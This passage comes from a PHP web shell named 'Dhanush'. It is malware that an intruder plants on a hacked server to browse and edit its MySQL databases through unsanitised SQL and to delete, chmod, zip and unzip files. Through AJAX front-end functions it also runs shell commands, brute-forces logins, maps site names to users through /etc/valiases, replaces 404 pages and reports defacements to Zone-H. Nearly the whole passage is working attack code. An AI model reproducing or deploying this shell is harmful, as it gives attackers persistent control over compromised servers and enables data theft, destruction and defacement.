  4217. echo "<div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>&gt;</font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>&gt;</font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
  4218. }
  4220. // View Table Data
  4221. if($_GET['action'] == "viewdata")
  4222. {
  4223. global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
  4224. $dbserver = $_COOKIE["dbserver"];
  4225. $dbuser = $_COOKIE["dbuser"];
  4226. $dbpass = $_COOKIE["dbpass"];
  4227. $dbname = $_GET['dbname'];
  4228. $tablename = $_GET['tablename'];
  4229. echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>&gt;</font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>&gt;</font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
  4230. ?>
  4231. <br><br>
  4232. <form>
  4233. <table>
  4234. <tr>
  4235. <td><textarea cols="60" rows="7" name="executemyquery" class="box">Execute Query..</textarea></td>
  4236. </tr>
  4237. <tr>
  4238. <td><input type="button" onClick="viewtables('executequery','<?php echo $_GET['dbname'];?>','<?php echo $_GET['tablename']; ?>','','',executemyquery.value)" value="Execute" class="but"></td>
  4239. </tr>
  4240. </table>
  4241. </form>
  4242. <?php
  4243. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
  4244. mysql_select_db($dbname);
  4246. $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
  4247. $row = mysql_fetch_array($sql);
  4248. $rowid = $row['COLUMN_NAME'];
  4250. echo "<br><font size=4 color =lime>Data in Table</font><br>";
  4251. if( $tablename != "" )
  4252. echo "<font size=3 class=txt>$dbname &gt; $tablename</font><br>";
  4253. else
  4254. echo "<font size=3 class=txt>$dbname</font><br>";
  4256. $queryStr = "";
  4257. $pag = 0;
  4258. $queryStr = stripslashes( $queryStr );
  4259. if( $queryStr == "" )
  4260. {
  4261. if(isset($_REQUEST['page']))
  4262. {
  4263. $res = mysql_query("select * from $tablename");
  4264. $getres = mysql_num_rows($res);
  4265. $coun = ceil($getres/30);
  4266. if($_REQUEST['page'] != 1)
  4268. $pag = $_REQUEST['page'] * 30;
  4269. else
  4270. $pag = $_REQUEST['page'] * 30;
  4272. $queryStr = "SELECT * FROM $tablename LIMIT $pag,30";
  4273. $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT $pag,30");
  4274. $arrcount = 1;
  4275. $arrdata[$arrcount] = 0;
  4276. while($row = mysql_fetch_array($sql))
  4277. {
  4278. $arrdata[$arrcount] = $row[$rowid];
  4279. $arrcount++;
  4280. }
  4281. }
  4282. else
  4283. {
  4284. $queryStr = "SELECT * FROM $tablename LIMIT 0,30";
  4285. $sql = mysql_query("SELECT $rowid FROM $tablename ORDER BY $rowid LIMIT 0,30");
  4286. $arrcount = 1;
  4287. $arrdata[$arrcount] = 0;
  4288. while($row = mysql_fetch_array($sql))
  4289. {
  4290. $arrdata[$arrcount] = $row[$rowid];
  4291. $arrcount++;
  4292. }
  4293. }
  4294. if( $orderby != "" )
  4295. $queryStr .= " ORDER BY $orderby";
  4296. echo "<a href=# onClick=\"viewtables('viewSchema','$dbname','$tablename')\"><font size=3>Schema</font></a>\n";
  4297. }
  4300. $pResult = mysql_query($queryStr );
  4301. $fieldt = mysql_fetch_field($pResult);
  4302. $tablename = $fieldt->table;
  4303. $errMsg = mysql_error();
  4305. $GLOBALS[queryStr] = $queryStr;
  4307. if( $pResult == false )
  4308. {
  4309. echoQueryResult();
  4310. return;
  4311. }
  4312. if( $pResult == 1 )
  4313. {
  4314. $errMsg = "Success";
  4315. echoQueryResult();
  4316. return;
  4317. }
  4319. echo "<hr color='#1B1B1B'>\n";
  4321. $row = mysql_num_rows( $pResult );
  4322. $col = mysql_num_fields( $pResult );
  4324. if( $row == 0 )
  4325. {
  4326. echo "<font size=3>No Data Exist!</font>";
  4327. return;
  4328. }
  4330. if( $rowperpage == "" ) $rowperpage = 30;
  4331. if( $page == "" ) $page = 0;
  4332. else $page--;
  4333. mysql_data_seek( $pResult, $page * $rowperpage );
  4335. echo "<table cellspacing=1 cellpadding=5 border=1 align=center>\n";
  4336. echo "<tr>\n";
  4337. for( $i = 0; $i < $col; $i++ )
  4338. {
  4339. $field = mysql_fetch_field( $pResult, $i );
  4340. echo "<th>";
  4341. if($action == "viewdata")
  4342. echo "<a href='$PHP_SELF?action=viewdata&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
  4343. else
  4344. echo $field->name."\n";
  4345. echo "</th>\n";
  4346. }
  4347. echo "<th colspan=2>Action</th>\n";
  4348. echo "</tr>\n";
  4349. $num=1;
  4352. $acount = 1;
  4354. for( $i = 0; $i < $rowperpage; $i++ )
  4355. {
  4356. $rowArray = mysql_fetch_row( $pResult );
  4357. if( $rowArray == false ) break;
  4358. echo "<tr>\n";
  4359. $key = "";
  4360. for( $j = 0; $j < $col; $j++ )
  4361. {
  4362. $data = $rowArray[$j];
  4364. $field = mysql_fetch_field( $pResult, $j );
  4365. if( $field->primary_key == 1 )
  4366. $key .= "&" . $field->name . "=" . $data;
  4368. if( strlen( $data ) > 30 )
  4369. $data = substr( $data, 0, 30 ) . "...";
  4370. $data = htmlspecialchars( $data );
  4371. echo "<td>\n";
  4372. echo "<font class=txt>$data</font>\n";
  4373. echo "</td>\n";
  4374. }
  4376. if(!is_numeric($arrdata[$acount]))
  4377. echo "<td colspan=2>No Key</td>\n";
  4378. else
  4379. {
  4380. echo "<td><a href=# onClick=\"viewtables('editData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Edit</a></td>\n";
  4381. echo "<td><a href=# onClick=\"viewtables('deleteData','$dbname','$tablename','$rowid','$arrdata[$acount]')\">Delete</a></td>\n";
  4382. $acount++;
  4383. }
  4384. }
  4385. echo "</tr>\n";
  4388. echo "</table>";
  4389. if($arrcount > 30)
  4390. {
  4391. $res = mysql_query("select * from $tablename");
  4392. $getres = mysql_num_rows($res);
  4393. $coun = ceil($getres/30);
  4394. echo "<form action=$self><input type=hidden value=viewdata name=action><input type=hidden name=tablename value=$tablename><input type=hidden value=$dbname name=dbname><select style='width: 95px;' name=page class=sbox>";
  4395. for($i=0;$i<$coun;$i++)
  4396. echo "<option value=$i>$i</option>";
  4398. echo "</select> <input type=button onClick=\"viewtables('viewdata','$dbname','$tablename','','','','',page.value)\" value=Go class=but></form>";
  4399. echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>&gt;</font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>&gt;</font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
  4400. }
  4401. }
  4403. // Delete Table Data
  4404. if($_GET['action'] == "deleteData")
  4405. {
  4406. $dbserver = $_COOKIE["dbserver"];
  4407. $dbuser = $_COOKIE["dbuser"];
  4408. $dbpass = $_COOKIE["dbpass"];
  4409. $dbname = $_GET['dbname'];
  4410. $tablename = $_GET['tablename'];
  4411. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
  4412. mysql_select_db($dbname);
  4413. $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
  4414. $row = mysql_fetch_array($sql);
  4415. $row = $row['COLUMN_NAME'];
  4416. $rowid = $_GET[$row];
  4417. mysql_query("delete from $tablename where $row = '$rowid'");
  4418. listtable();
  4419. }
  4420. // Edit Table Data
  4421. if($_GET['action'] == "editData")
  4422. {
  4423. global $queryStr, $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby, $data;
  4424. $dbserver = $_COOKIE["dbserver"];
  4425. $dbuser = $_COOKIE["dbuser"];
  4426. $dbpass = $_COOKIE["dbpass"];
  4427. $dbname = $_GET['dbname'];
  4428. $tablename = $_GET['tablename'];
  4429. echo "<br><div><font color=white size=3>[ $dbname ]</font> - <font color=white size=3>&gt;</font> <a href=# onClick=\"viewtables('viewdb')\"> <font size=3>Database List</font> </a> <font color=white size=3>&gt;</font> <a href=# onClick=\"viewtables('listTables','$dbname','$tablename')\"> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font size=3>[ Log Out ]</font> </a></div>";
  4430. ?>
  4431. <br><br>
  4432. <form action="<?php echo $self; ?>" method="post">
  4433. <?php
  4434. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
  4435. mysql_select_db($dbname);
  4437. $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
  4438. $row = mysql_fetch_array($sql);
  4439. $row = $row['COLUMN_NAME'];
  4440. $rowid = $_GET[$row];
  4442. $pResult = mysql_list_fields( $dbname, $tablename );
  4443. $num = mysql_num_fields( $pResult );
  4445. $key = "";
  4446. for( $i = 0; $i < $num; $i++ )
  4447. {
  4448. $field = mysql_fetch_field( $pResult, $i );
  4449. if( $field->primary_key == 1 )
  4450. if( $field->numeric == 1 )
  4451. $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
  4452. else
  4453. $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
  4454. }
  4455. $key = substr( $key, 0, strlen($key)-4 );
  4457. mysql_select_db( $dbname, $mysqlHandle );
  4458. $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $row = $rowid", $mysqlHandle );
  4459. $data = mysql_fetch_array( $pResult );
  4461. echo "<table cellspacing=1 cellpadding=2 border=1>\n";
  4462. echo "<tr>\n";
  4463. echo "<th>Name</th>\n";
  4464. echo "<th>Type</th>\n";
  4465. echo "<th>Function</th>\n";
  4466. echo "<th>Data</th>\n";
  4467. echo "</tr>\n";
  4469. $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
  4470. $num = mysql_num_rows( $pResult );
  4472. $pResultLen = mysql_list_fields( $dbname, $tablename );
  4473. $fundata1 = "'action','editsubmitData','dbname','".$dbname."','tablename','".$tablename."',";
  4474. $fundata2 = "'action','insertdata','dbname','".$dbname."','tablename','".$tablename."',";
  4475. for( $i = 0; $i < $num; $i++ )
  4476. {
  4477. $field = mysql_fetch_array( $pResult );
  4478. $fieldname = $field["Field"];
  4479. $fieldtype = $field["Type"];
  4480. $len = mysql_field_len( $pResultLen, $i );
  4482. echo "<tr>";
  4483. echo "<td>$fieldname</td>";
  4484. echo "<td>".$field["Type"]."</td>";
  4485. echo "<td>\n";
  4486. echo "<select name=${fieldname}_function class=sbox>\n";
  4487. echo "<option>\n";
  4488. echo "<option>ASCII\n";
  4489. echo "<option>CHAR\n";
  4490. echo "<option>SOUNDEX\n";
  4491. echo "<option>CURDATE\n";
  4492. echo "<option>CURTIME\n";
  4493. echo "<option>FROM_DAYS\n";
  4494. echo "<option>FROM_UNIXTIME\n";
  4495. echo "<option>NOW\n";
  4496. echo "<option>PASSWORD\n";
  4497. echo "<option>PERIOD_ADD\n";
  4498. echo "<option>PERIOD_DIFF\n";
  4499. echo "<option>TO_DAYS\n";
  4500. echo "<option>USER\n";
  4501. echo "<option>WEEKDAY\n";
  4502. echo "<option>RAND\n";
  4503. echo "</select>\n";
  4504. echo "</td>\n";
  4505. $value = htmlspecialchars($data[$i]);
  4506. $type = strtok( $fieldtype, " (,)\n" );
  4507. if( $type == "enum" || $type == "set" )
  4508. {
  4509. echo "<td>\n";
  4510. if( $type == "enum" )
  4511. echo "<select name=$fieldname class=box>\n";
  4512. else if( $type == "set" )
  4513. echo "<select name=$fieldname size=4 class=box multiple>\n";
  4514. while( $str = strtok( "'" ) )
  4515. {
  4516. if( $value == $str )
  4517. echo "<option selected>$str\n";
  4518. else
  4519. echo "<option>$str\n";
  4520. strtok( "'" );
  4521. }
  4522. echo "</select>\n";
  4523. echo "</td>\n";
  4524. }
  4525. else
  4526. {
  4527. if( $len < 40 )
  4528. echo "<td><input type=text size=40 maxlength=$len id=dhanush_$fieldname name=sql_$fieldname value=\"$value\" class=box></td>\n";
  4529. else
  4530. echo "<td><textarea cols=47 rows=3 maxlength=$len name=dhanush_$fieldname class=box>$value</textarea>\n";
  4531. }
  4532. $fundata1 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
  4533. $fundata2 .= "'dhanush_".$fieldname."',dhanush_".$fieldname.".value,";
  4534. echo "</tr>";
  4535. }
  4536. $fundata1=eregi_replace(',$', '', $fundata1);
  4537. $fundata2=eregi_replace(',$', '', $fundata2);
  4539. echo "</table><p>\n";
  4540. echo "<input type=button onClick=\"editdata($fundata1)\" value='Edit Data' class=but>\n";
  4541. echo "<input type=button value='Insert' onClick=\"editdata($fundata2)\" class=but>\n";
  4542. echo "</form>\n";
  4543. }
  4544. }
  4545. // Edit Submit Table Data
  4546. else if($_REQUEST['action'] == "editsubmitData")
  4547. {
  4548. $dbserver = $_COOKIE["dbserver"];
  4549. $dbuser = $_COOKIE["dbuser"];
  4550. $dbpass = $_COOKIE["dbpass"];
  4551. $dbname = $_POST['dbname'];
  4552. $tablename = $_POST['tablename'];
  4554. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
  4555. mysql_select_db($dbname);
  4557. $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
  4558. $row = mysql_fetch_array($sql);
  4559. $row = $row['COLUMN_NAME'];
  4560. $rowid = $_POST[$row];
  4562. $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
  4563. $num = mysql_num_rows( $pResult );
  4565. $rowcount = $num;
  4567. $pResultLen = mysql_list_fields( $dbname, $tablename );
  4569. for( $i = 0; $i < $num; $i++ )
  4570. {
  4571. $field = mysql_fetch_array( $pResult );
  4572. $fieldname = $field["Field"];
  4573. $arrdata = $_REQUEST[$fieldname];
  4575. $str .= " " . $fieldname . " = '" . $arrdata . "'";
  4576. $rowcount--;
  4577. if($rowcount != 0)
  4578. $str .= ",";
  4579. }
  4581. $str = "update $tablename set" . $str . " where $row=$rowid";
  4582. mysql_query($str);
  4583. ?><div id="showsql"></div><?php
  4584. }
  4585. // Insert Table Data
  4586. else if($_REQUEST['action'] == "insertdata")
  4587. {
  4588. $dbserver = $_COOKIE["dbserver"];
  4589. $dbuser = $_COOKIE["dbuser"];
  4590. $dbpass = $_COOKIE["dbpass"];
  4591. $dbname = $_POST['dbname'];
  4592. $tablename = $_POST['tablename'];
  4594. $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
  4595. mysql_select_db($dbname);
  4597. $sql = mysql_query("SELECT `COLUMN_NAME` FROM `information_schema`.`COLUMNS` WHERE (`TABLE_SCHEMA` = '$dbname') AND (`TABLE_NAME` = '$tablename') AND (`COLUMN_KEY` = 'PRI');");
  4598. $row = mysql_fetch_array($sql);
  4599. $row = $row['COLUMN_NAME'];
  4600. $rowid = $_POST[$row];
  4602. $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
  4603. $num = mysql_num_rows( $pResult );
  4605. $rowcount = $num;
  4607. $pResultLen = mysql_list_fields( $dbname, $tablename );
  4609. for( $i = 0; $i < $num; $i++ )
  4610. {
  4611. $field = mysql_fetch_array( $pResult );
  4612. $fieldname = $field["Field"];
  4613. $arrdata = $_REQUEST[$fieldname];
  4615. $str1 .= "".$fieldname . ",";
  4616. $str2 .= "'".$arrdata . "',";
  4617. $rowcount--;
  4618. if($rowcount != 0)
  4619. {
  4620. //$str1 .= $fieldname . ",";
  4621. //$str2 .= $arrdata . ",";
  4622. }
  4623. }
  4624. $str1=eregi_replace(',$', '', $str1);
  4625. $str2=eregi_replace(',$', '', $str2);
  4626. $str = "INSERT INTO `$tablename` ($str1) VALUES ($str2);";
  4627. mysql_query($str);
  4629. ?><div id="showsql"></div><?php
  4630. }
  4631. else if(isset($_GET['logoutdb']))
  4632. {
  4633. setcookie("dbserver",time() - 60*60);
  4634. setcookie("dbuser",time() - 60*60);
  4635. setcookie("dbpass",time() - 60*60);
  4636. header("Location:$self");
  4637. }
  4638. else if(isset($_POST['choice']))
  4639. {
  4640. if($_POST['choice'] == "delete")
  4641. {
  4642. $actbox = $_POST["actbox"];
  4644. foreach ($actbox as $myv)
  4645. $myv = explode(",",$myv);
  4646. foreach ($myv as $v)
  4647. {
  4648. if(is_file($v))
  4649. {
  4650. if(unlink($v))
  4651. echo "<br><center><font class=txt>File $v Deleted Successfully</font></center>";
  4652. else
  4653. echo "<br><center>Cannot Delete File $v</center>";
  4654. }
  4655. else if(is_dir($v))
  4656. {
  4657. rrmdir($v);
  4658. }
  4659. }
  4660. }
  4661. else if($_POST['choice'] == "chmod")
  4662. { ?>
  4663. <form id="chform"><?php
  4664. $actbox1 = $_POST['actbox'];
  4665. foreach ($actbox1 as $myv)
  4666. $myv = explode(",",$myv);
  4667. foreach ($myv as $v)
  4668. { ?>
  4669. <input type="hidden" name="actbox3[]" id="actbox3[]" value="<?php echo $v; ?>">
  4670. <?php }
  4671. ?>
  4672. <table align="center" border="3" style="width:40%; border-color:#333333;">
  4673. <tr>
  4674. <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
  4675. </tr>
  4676. <tr>
  4677. <td colspan="2" align="center" style="height:60px">
  4678. <input type="button" onClick="myaction('changefileperms',chmode.value)" value="Change Permission" class="but" style="padding: 5px;" /></td>
  4679. </tr>
  4680. </table>
  4682. </form> <?php
  4683. }
  4684. else if($_POST['choice'] == "changefileperms")
  4685. {
  4686. if($_POST['chmode'] != null && is_numeric($_POST['chmode']))
  4687. {
  4688. $actbox = $_POST["actbox"];
  4689. foreach ($actbox as $myv)
  4690. $myv = explode(",",$myv);
  4691. foreach ($myv as $v)
  4692. {
  4693. if(is_file($v) || is_dir($v))
  4694. {
  4695. $perms = 0;
  4696. for($i=strlen($_POST['chmode'])-1;$i>=0;--$i)
  4697. $perms += (int)$_POST['chmode'][$i]*pow(8, (strlen($_POST['chmode'])-$i-1));
  4698. echo "<div align=left style=width:60%;>";
  4699. if(@chmod($v,$perms))
  4700. echo "<font class=txt>File $v Permissions Changed Successfully</font><br>";
  4701. else
  4702. echo "Cannot Change $v File Permissions<br>";
  4703. echo "</div>";
  4704. }
  4705. }
  4707. }
  4708. }
  4709. else if($_POST['choice'] == "compre")
  4710. {
  4711. $actbox = $_POST["actbox"];
  4712. foreach ($actbox as $myv)
  4713. $myv = explode(",",$myv);
  4714. foreach ($myv as $v)
  4715. {
  4716. if(is_file($v))
  4717. {
  4718. $zip = new ZipArchive();
  4719. $filename= basename($v) . '.zip';
  4720. if(($zip->open($filename, ZipArchive::CREATE))!==true)
  4721. { echo '<br><font size=3>Error: Unable to create zip file for $v</font>';}
  4722. else {echo "<br><font class=txt size=3>File $v Compressed successfully</font>";}
  4723. $zip->addFile(basename($v));
  4724. $zip->close();
  4725. }
  4726. else if(is_dir($v))
  4727. {
  4728. if($os == "Linux")
  4729. {
  4730. $filename= basename($v);
  4731. execmd("tar --create --recursion --file=$filename.tar $v");
  4732. echo "<br><font class=txt size=3>File $v Compressed successfully as $v.tar</font>";
  4733. }
  4734. }
  4735. }
  4736. }
  4737. else if($_POST['choice'] == "uncompre")
  4738. {
  4739. $actbox = $_POST["actbox"];
  4740. foreach ($actbox as $myv)
  4741. $myv = explode(",",$myv);
  4742. foreach ($myv as $v)
  4743. {
  4744. if(is_file($v) || is_dir($v))
  4745. {
  4746. $zip = new ZipArchive;
  4747. $filename= basename($v);
  4748. $res = $zip->open($filename);
  4749. if ($res === TRUE)
  4750. {
  4751. $pieces = explode(".",$filename);
  4752. $zip->extractTo($pieces[0]);
  4753. $zip->close();
  4754. echo "<br><font class=txt size=3>File $v Unzipped successfully</font>";
  4755. } else
  4756. echo "<br><font size=3>Error: Unable to Unzip file $v</font>";
  4757. }
  4758. }
  4759. }
  4760. }
  4761. else if(isset($_GET['sitename']))
  4762. {
  4763. $sitename = str_replace("http://","",$_GET['sitename']);
  4764. $sitename = str_replace("http://www.","",$sitename);
  4765. $sitename = str_replace("www.","",$sitename);
  4766. $show = myexe("ls -la /etc/valiases/".$sitename);
  4767. if(!empty($show))
  4768. echo $show;
  4769. else
  4770. echo "Cannot get the username";
  4771. }
  4772. else if(isset($_GET['mydata']))
  4773. {
  4774. listdatabase();
  4775. }
  4776. else if(isset($_GET['home']))
  4777. {
  4778. mainfun($_GET['home']);
  4779. }
  4780. else if(isset($_GET['dir']))
  4781. {
  4782. mainfun($_GET['myfilepath']);
  4783. }
  4784. else if(isset($_GET['mydirpath']))
  4785. {
  4786. echo is_writable($_GET['mydirpath'])?"<font class=txt>&lt; writable &gt;</font>":"&lt; not writable &gt;";
  4787. }
  4788. else
  4789. {
  4790. ?>
  4791. <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
  4792. <title>Dhanush : By Gennike</title>
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  4794. checked = false;
  4795. var waitstate = "<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
  4796. function checkedAll ()
  4797. {
  4798. if (checked == false){checked = true}else{checked = false}
  4799. for (var i = 0; i < document.getElementById('myform').elements.length; i++)
  4800. {
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  4804. function urlchange(myfilepath)
  4805. {
  4806. var mypath, mpath, i, t, j, r = "",myurl = "",splitter="";
  4807. splitter = "<?php echo addslashes($directorysperator); ?>";
  4808. mypath = mpath = myfilepath.split(splitter);
  4809. <?php if($os == "Linux") { ?>
  4810. r = "/";
  4811. myurl = "<a href=javascript:void(0) onClick=\"changedir('dir','/')\">/</a>";
  4812. <?php } ?>
  4813. for (i = 0; i < mypath.length; i++)
  4814. {
  4815. if(mypath[i] == "")
  4816. continue;
  4817. r += mypath[i]+"<?php echo addslashes($directorysperator); ?>";
  4819. myurl += "<a href=javascript:void(0) onClick=\"changedir('dir','"+r+"\')\"><b>"+mypath[i]+"<?php echo addslashes($directorysperator); ?></b></a>";
  4820. }
  4821. myurl = myurl.replace(/\\/g,"\\\\");
  4822. return myurl;
  4823. }
  4824. function wrtblDIR(mydirpath)
  4825. {
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  4842. {
  4843. wrtblDIR(myfilpath);
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  4845. document.getElementById("createfile").value=myfilpath;
  4846. document.getElementById("createfolder").value=myfilpath;
  4847. document.getElementById("createfolder").value=myfilpath;
  4848. document.getElementById("exepath").value=myfilpath;
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  4871. ajaxRequest.send(null);
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  4874. {
  4875. var myurl = urlchange(mydir);
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  4877. var ajaxRequest;
  4878. ajaxRequest = new XMLHttpRequest();
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  4894. {
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  4905. }
  4907."GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?sitename="+sitename, true);
  4908. ajaxRequest.send(null);
  4909. }
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  4911. {
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  4916. {
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  4918. mychoice[i] = mytype[i].value;
  4919. }
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  4923. document.getElementById("showdir").innerHTML=waitstate;
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  4928. {
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  4930. {
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  4933. }
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  4937. ajaxRequest.send(params);
  4938. }
  4939. function editdata()
  4940. {
  4941. var result = "", // initialize list
  4942. i,dbname,tablename;
  4943. // iterate through arguments
  4944. for (i = 1; i < arguments.length; i++)
  4945. {
  4946. if(i%2 == 0)
  4947. result += arguments[i]+'=';
  4948. else
  4949. result += arguments[i]+'&';
  4950. }
  4951. result = result.slice(0, -1);
  4953. dbname = arguments[3];
  4954. tablename = arguments[5];
  4955. var result=result.replace(/dhanush_/g,"");
  4956. var params = arguments[0]+"="+result;
  4958. document.getElementById("showsql").innerHTML=waitstate;
  4959. var ajaxRequest;
  4960. ajaxRequest = new XMLHttpRequest();
  4962. ajaxRequest.onreadystatechange = function()
  4963. {
  4964. if(ajaxRequest.readyState == 4)
  4965. {
  4966. viewtables('listTables',dbname,tablename);
  4967. }
  4968. }
  4970."POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
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  4972. ajaxRequest.send(params);
  4973. }
  4974. function viewtables(action,dbname,tablename,rowid,arrdata,executequery,fieldname,page)
  4975. {
  4976. document.getElementById("showsql").innerHTML=waitstate;
  4977. var ajaxRequest;
  4978. ajaxRequest = new XMLHttpRequest();
  4980. ajaxRequest.onreadystatechange = function()
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  4983. {
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  4986. }
  4988."GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?action="+action+"&dbname="+dbname+"&tablename="+tablename+"&"+rowid+"="+arrdata+"&executemyquery="+executequery+"&fieldname="+fieldname+"&page="+page, true);
  4989. ajaxRequest.send(null);
  4990. }
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  4992. {
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  4994. var ajaxRequest;
  4995. ajaxRequest = new XMLHttpRequest();
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  5000. {
  5001. mydatago();
  5002. }
  5003. }
  5005."GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executeit&server="+server+"&username="+username+"&password="+password, true);
  5006. ajaxRequest.send(null);
  5007. }
  5008. function mydatago()
  5009. {
  5010. var ajaxRequest;
  5011. ajaxRequest = new XMLHttpRequest();
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  5022."GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?mydata", true);
  5023. ajaxRequest.send(null);
  5024. }
  5025. function bruteforce(prototype,serverport,login,dict)
  5026. {
  5027. var mytype = document.getElementsByName('mytype');
  5028. for (var i = 0, length = mytype.length; i < length; i++)
  5029. {
  5030. if (mytype[i].checked)
  5031. break;
  5032. }
  5033. var getreverse = 0;
  5034. if(document.getElementById('reverse').checked == true)
  5035. getreverse = 1;
  5036. else
  5037. getreverse = 0;
  5039. document.getElementById("showbrute").innerHTML=waitstate;
  5040. var ajaxRequest;
  5041. ajaxRequest = new XMLHttpRequest();
  5043. ajaxRequest.onreadystatechange = function()
  5044. {
  5045. if(ajaxRequest.readyState == 4)
  5046. {
  5047. document.getElementById("showbrute").innerHTML=ajaxRequest.responseText;
  5048. }
  5049. }
  5051."GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?prototype="+prototype+"&serverport="+serverport+"&login="+login+"&dict="+dict+"&type="+mytype[i].value+"&reverse="+getreverse, true);
  5052. ajaxRequest.send(null);
  5053. }
  5054. function executemyfile(action,executepath,execute)
  5055. {
  5056. document.getElementById("showmaindata").innerHTML=waitstate;
  5057. var ajaxRequest;
  5058. ajaxRequest = new XMLHttpRequest();
  5060. ajaxRequest.onreadystatechange = function()
  5061. {
  5062. if(ajaxRequest.readyState == 4)
  5063. {
  5064. document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
  5065. }
  5066. }
  5068."GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+action+"&executepath="+executepath+"&execute="+execute, true);
  5069. ajaxRequest.send(null);
  5070. }
  5071. function maindata(myaction,dir)
  5072. {
  5073. document.getElementById("showmaindata").innerHTML=waitstate;
  5074. var ajaxRequest;
  5075. ajaxRequest = new XMLHttpRequest();
  5077. ajaxRequest.onreadystatechange = function()
  5078. {
  5079. if(ajaxRequest.readyState == 4)
  5080. {
  5081. document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
  5082. document.getElementById("showdir").innerHTML="";
  5083. }
  5084. }
  5086."GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+myaction+"&dir="+dir, true);
  5087. ajaxRequest.send(null);
  5088. }
  5089. function manuallyscriptfn(passwd)
  5090. {
  5091. var message = encodeURIComponent(passwd);
  5092. var params = "scriptlocator=scriptlocator&passwd="+passwd;
  5093. document.getElementById("showdata").innerHTML=waitstate;
  5094. var ajaxRequest;
  5095. ajaxRequest = new XMLHttpRequest();
  5097. ajaxRequest.onreadystatechange = function()
  5098. {
  5099. if(ajaxRequest.readyState == 4)
  5100. {
  5101. document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
  5102. }
  5103. }
  5105."POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
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  5107. ajaxRequest.send(params);
  5108. }
  5109. function my404page(message)
  5110. {
  5111. var message = encodeURIComponent(message);
  5112. var params = "404page=404page&message="+message;
  5113. document.getElementById("showdata").innerHTML=waitstate;
  5114. var ajaxRequest;
  5115. ajaxRequest = new XMLHttpRequest();
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  5118. {
  5119. if(ajaxRequest.readyState == 4)
  5120. {
  5121. document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
  5122. }
  5123. }
  5125."POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
  5126. ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
  5127. ajaxRequest.send(params);
  5128. }
  5129. function executemyfn(executepath,executemycmd)
  5130. {
  5131. document.getElementById("showexecute").innerHTML="Wait....";
  5132. var ajaxRequest;
  5133. ajaxRequest = new XMLHttpRequest();
  5135. ajaxRequest.onreadystatechange = function()
  5136. {
  5137. if(ajaxRequest.readyState == 4)
  5138. {
  5139. document.getElementById("showexecute").innerHTML=ajaxRequest.responseText;
  5140. }
  5141. }
  5143."GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executepath="+executepath+"&executemycmd="+executemycmd, true);
  5144. ajaxRequest.send(null);
  5145. }
  5146. function zoneh(defacer,hackmode,reason,domain)
